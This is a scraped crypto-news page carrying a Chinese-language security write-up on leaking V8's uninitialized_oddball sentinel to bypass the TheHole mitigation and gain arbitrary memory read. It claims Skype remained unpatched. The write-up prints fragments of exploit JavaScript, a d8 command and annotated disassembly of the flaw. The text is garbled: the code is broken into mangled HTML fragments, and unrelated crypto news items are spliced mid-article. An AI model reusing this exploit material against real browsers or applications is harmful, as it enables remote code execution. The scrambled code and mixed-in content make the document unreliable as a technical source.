BTC/HKD-0.36%
ETH/HKD-0.4%
LTC/HKD-0.45%
DOT/HKD-0.92%
ADA/HKD-1.02%
SOL/HKD-0.25%
XRP/HKD-0.44%
DOGE/US-0.76%前言
Sentinelvalue(又名flagvalue/tripvalue/roguevalue/signalvalue/dummydata)是算法中的一個特殊值,通常在循環或遞歸算法中作為終止條件的特殊值存在。Chrome源碼中有很多Sentinelvalue。from-leaking-thehole-to-chrome-renderer-rce和TheHoleNewWorld-howasmallleakwillsinkagreatbrowser(CVE-2021-38003)中,都介紹了如何通過泄露TheHole對象實現CVE-2021-38003和CVE-2022–1364的沙箱內任意代碼執行。在我們發文闡述該緩解繞過大概一周后,谷歌團隊也迅速把這兩個在野CVE同步更新到了github上。時間節點如下:
{this</p>
<p> <b>fhi(f){this</b></p>
<p> flow(f){this</p>
<p> }functionUninitializedOddballExploiter(uninitialized_oddball){varh=newHelpers();letarr=newArray(0x1000000);arr=1</p>
<p> ;%PrepareFunctionForOptimization(read);read(exp2,0);%OptimizeFunctionOnNextCall(read);constold_space=0x200000;//0x200000letstart_offset=Math</p>
<p> Kraken將于8月15日上線Sei(SEI):金色財經報道,據官方博客報道,加密貨幣交易所Kraken將于8月15日上線Sei(SEI)。[2023/8/11 16:19:32]</p>
<p> }UninitializedOddballExploiter(%TheHole());//注意對%TheHole()做patch</p>
<p> 我們對上述代碼在v8-11.0.0中測試,當%TheHole()返回UninitializedOddball時,仍舊可以實現相對任意讀。</p>
<p> ./d8--expose-gc--allow-natives-syntax--print-opt-code--print-opt-code-filter=read--trace-turbo/home/avboy/Desktop/poc2.js</p>
<p> 對優化后的JavaScript的read函數去掉Prologue,留下關鍵反匯編如下所示:</p>
<p> 0x558b2000406929488b4d18REX.Wmovqrcx,0x558b2000406d2df6c101testbrcx,0x1;;checkifrcx(ie.obj,the1stargoffunction)is'Smi'0x558b20004070300f842e020000jz0x558b200042a4<+0x264>;;deoptreason'Smi'0x558b200040763641b831cd1900movlr8,0x19cd31;;(compressed)object:0x17140019cd31<Map(HOLEY_ELEMENTS)>0x558b2000407c3c443941ffcmpl,r8;;checkthemap(r8=0x19cd31isthemapofobj);;herewecheckthemapofobj,butwedidnotcheckthevalueofkey(ie.obj.prop);;andifwemakethevalueofkeytobeuninitialized_oddball,thereisthebypass0x558b20004080400f8522020000jnz0x558b200042a8<+0x268>;;deoptreason'wrongmap'0x558b2000408646448b410bmovlr8,;;*(addr(obj)+0xb)->r80x558b2000408a4a478b44060bmovlr8,;;r14ishighaddr0x558b2000408f4f4d03c6REX.Waddqr8,r14;;r8->inReadOnlySpace:#uninitialized0x558b2000409252458b4807movlr9,;;0x558b20004096564d03ceREX.Waddqr9,r14;;r9->0x2eb90000000d0x558b2000409959458b400bmovlr8,;;0x558b2000409d5d488b7d20REX.Wmovqrdi,;;rdiisindexofarr,the2ndargoffunction0x558b200040a16140f6c701testbrdi,0x1;;checkifrdiis'Smi'0x558b200040a5650f85da000000jnz0x558b20004185B5<+0x145>;;ifrdiisnot'Smi',JMP0x558b200040ab6b4c63dfREX.Wmovsxlqr11,rdi;;0x558b200040ae6e49d1fbREX.Wsarqr11,1;;r11/2,because'Smi'storedas'Smi'*2inMemory0x558b200040b1714d63c0REX.Wmovsxlqr8,r80x558b200040b47449d1f8REX.Wsarqr8,10x558b200040b7774d3bd8REX.Wcmpqr11,r8;;r11=0x40002,real_offsetastheindexofarr0x558b200040ba7a0f83ec010000jnc0x558b200042ac<+0x26c>;;deoptreason'outofbounds'0x558b200040c080c4817b1044d907vmovsdxmm0,;;movedoublefloatvaluetoxmm00x558b200040c787c5f92ec0vucomisdxmm0,xmm0;;ComparefloatvalueandSetEFLAGS0x558b200040cb8b0f8a88010000jpe0x558b20004259B9<+0x219>;;jpe(Jumpifparityeven)0x558b200040d1????91??0f8582010000?????????jnz?0x558b20004259??B9?<+0x219>??;;?jnz(Jump?if?not?zero)</p>
<p> 科大訊飛與寒武紀成立智算科技公司,含區塊鏈技術軟件業務:金色財經報道,7月6日,天眼查顯示,7月4日,遼寧智算科技服務有限公司成立,法定代表人為李俊峰,注冊資本500萬人民幣,經營范圍含網絡與信息安全軟件開發、信息系統集成服務、人工智能基礎軟件開發、云計算裝備技術服務、區塊鏈技術相關軟件和服務等。[2023/7/6 22:21:12]</p>
<p> 在0x558b2000407c處,檢查了read函數的obj,確定其prop屬性正確,但沒有檢查以obj.prop為key的Value,而是直接按照JavaScript語義計算偏移,求取數組的數值。如此導致我們在計算的時造成類型混淆,實現任意讀。</p>
<p> 如上匯編所示,當我們傳入uninitialized_oddball時,從0x558b20004086開始以obj為起點計算,最終在vmovsdxmm0,指令中完成任意讀,數據保存在xmm0寄存器中。類似TheHole對象,由于uninitialized_oddball在v8內存中排序靠前,且對象內容更加原始,偽造更加容易,在TheHole緩解繞過修復后,該方法不失為繞過首選。同理,任意寫我們可以參考Issue1352549進行構造分析。由于原理雷同,這里不再贅述。</p>
<p> 這里修復建議是,對優化后的函數返回數組元素時,添加對數組map的檢查,避免直接計算偏移返回數組數值。</p>
<p> PatchGapAlert</p>
<p> 在我們談論PatchGap時,實際上我們不僅僅需要關注曾經出現的歷史漏洞,我們還要關注廠商在基礎組件中悄悄修復的漏洞。對Issue1352549分析后,我們迅速排查了可能存在PatchGap的軟件,這里不得不指出,截至目前Skype仍舊沒有對該漏洞進行修復。在x86下任意讀寫會稍有不同。x64下由于存在地址壓縮,在tuborgfun優化javascript生成的代碼中,v8會默認將基址加上。x86由于沒有基址,因此任意讀寫是直接相對于整個進程的。如下匯編所示:</p>
<p> Nomad:目前已有41個錢包地址返還3620萬美元被盜資金:8月9日消息,Nomad發推稱,到目前為止,已經有3620萬美元從41個錢包地址返還至Nomad的官方恢復錢包地址中。Nomad對已經歸還資金的白帽黑客表示感謝,并再次呼吁其他白帽返還被盜資金。[2022/8/9 12:12:26]</p>
<p> 0x3979b8ff3f8b790bmovedi,0x3979b902428b7f0bmovedi,0x3979b905458b4707moveax,;;eaxwillbeafixednumber0x3979b908488b7f0bmovedi,0x3979b90b4b8b5510movedx,0x3979b90e4ef6c201test_bdl,0x10x3979b911510f85b6000000jnz0x3979b9cd<+0x10d>0x3979b9175789d6movesi,edx0x3979b91959d1fesaresi,1;;esiisindex0x3979b91b5bd1ffsaredi,1;;0x3734b73a0x3979b91d5d3bf7cmpesi,edi0x3979b91f5f0f838e010000jnc0x3979bab3<+0x1f3>;;deoptreason'outofbounds'0x3979b92565c5fb104cf007vmovsdxmm1,xmm0,;;</p>
<p> 如上所示,esi為任意讀數組的索引,eax為固定值,edi為)
Messari基金持倉分析報告:上半年基金偏向智能合約平臺和DEX:6月27日消息,Messari日前發布2022年上半年基金持倉分析報告。報告指出,截至6月14日,在追蹤的82支基金中,波卡最受青睞,有29支基金持有。其次是Oasis Network(24支基金持有)和Nervos Network(23支基金持有)。
此外,在基金持有率排名前50位的資產中,智能合約平臺類資產占比最高,為37%,其次是去中心化交易平臺,占比16%。[2022/6/27 1:34:11]
因此,在edi范圍內,可以任意讀寫。在具體做skype的exp時,雖然此時我們沒有地址壓縮帶來內存讀寫的便利,且skype開啟了aslr。但由于該文件太大,直接放在4GB內存中,黑客只需要對某個固定地址進行讀寫,便可以一個極大的概率讀寫skype文件中的內容。結合PE解析等傳統思路,不難完成整個漏洞利用鏈。基于此,我們無法保證黑客不能在短時間內完成整個利用鏈的適配。
這次PatchGap實際上不止需要排查Issue1352549,由于一個新的繞過方法的公開,直接導致了類似Issue1314616和Issue1216437的利用難度大幅度降低,黑客幾乎不需要花費任何研究成本,即可實現以往任何泄露uninitialized_oddball漏洞的完整利用,包括谷歌clusterfuzz提交的所有Issue中類似的漏洞。
總結
本文僅拋磚引玉,粗略來談通過泄露Sentinelvalue中的uninitialized_Oddball來實現任意讀原語。如第二部分所示,v8中的Sentinelvalue還有很多,實際上我們在測試Sentinelvalue的時候,也會經常容易遇到崩潰,不乏有非int3的崩潰出現。由于Uninitialized_Oddball和TheHole均已被證明可以在v8中實現環節繞過,我們有充分的理由懷疑其他Sentinelvalue也可能導致類似問題。
數據:昨日礦工向交易平臺凈轉入8.8萬枚BTC,創歷史新高:6月16日消息,CoinMetrics分析師Kyle Waters在推特上表示,昨日礦工向交易所凈轉入8.8萬枚BTC,創歷史新高。[2022/6/16 4:30:44]
這也給我們一點提示:
01-其他uninitialized_Oddball泄露是否會輕松實現v8的RCE;
02-我們已經看到,谷歌會迅速將TheHole繞過進行修復,我們也看到利用垃圾回收實現ASLR繞過被長期擱置。這說明類似issue仍處在一個模糊邊界,即是否被正式當作安全問題對待。
03-如果02中的問題被當作正式安全問題對待,那么在fuzzer中是否有必要考慮將%TheHole/uninitialized_Oddball等Sentinelvalue作為變量加入,來挖掘其他利用原語;
這里不得不強調的是,無論該類問題是否被正式當作安全問題對待,它都會大大縮減黑客實現完整利用周期。
參考資料
https://bugs.chromium.org/p/chromium/issues/detail?id=1314616
https://bugs.chromium.org/p/chromium/issues/detail?id=1352549
https://bugs.chromium.org/p/chromium/issues/detail?id=1216437
https://starlabs.sg/blog/2022/12-the-hole-new-world-how-a-small-leak-will-sink-a-great-browser-cve-2021-38003/
作者:Coinbase機構研究主管DavidDuong編譯:DeFi之道隔夜的粥圖片來源:由無界版圖AI工具生成 核心觀點: 我們預計數字資產選擇將根據可持續代幣經濟學、各自生態系統的成熟度以及.
1900/1/1 0:00:00L2Rollup概述 在過去的幾年中,隨著以太坊網絡活動的增加,2層協議Rollup解決方案已成為重要的解決方案。非同質化代幣和去中心化金融的活動和參與引起了1層區塊鏈活動的激增.
1900/1/1 0:00:002022年對加密行業來說是一段旅程。在本報告中,我們整理了2022年十大加密貨幣事件和趨勢,其次是我們對2023年的展望.
1900/1/1 0:00:002022年,是Web3行業發生翻天覆地變化的一年。有時讓人振奮,也有沮喪和恐慌的時刻。上半年,美國各行各業掀起了一場Web3浪潮,這場浪潮隨著互聯網、金融和消費行業的巨頭和行業領導者的加入而被推.
1900/1/1 0:00:00自從我上次分享我推薦的書單已經過去2年了,那段時間我的生活發生了很多事情,包括幣安的成長,當然還有加密貨幣領域的演變。?我認為在這個假期期間,我最好看一下最初的清單并為2023年及以后更新它.
1900/1/1 0:00:00關于DeFi的思考:它仍然是一個由賭徒組成的循環經濟,其中一個賭徒以另一個賭徒的損失為食,也就是零和游戲.
1900/1/1 0:00:00
比特幣交易所
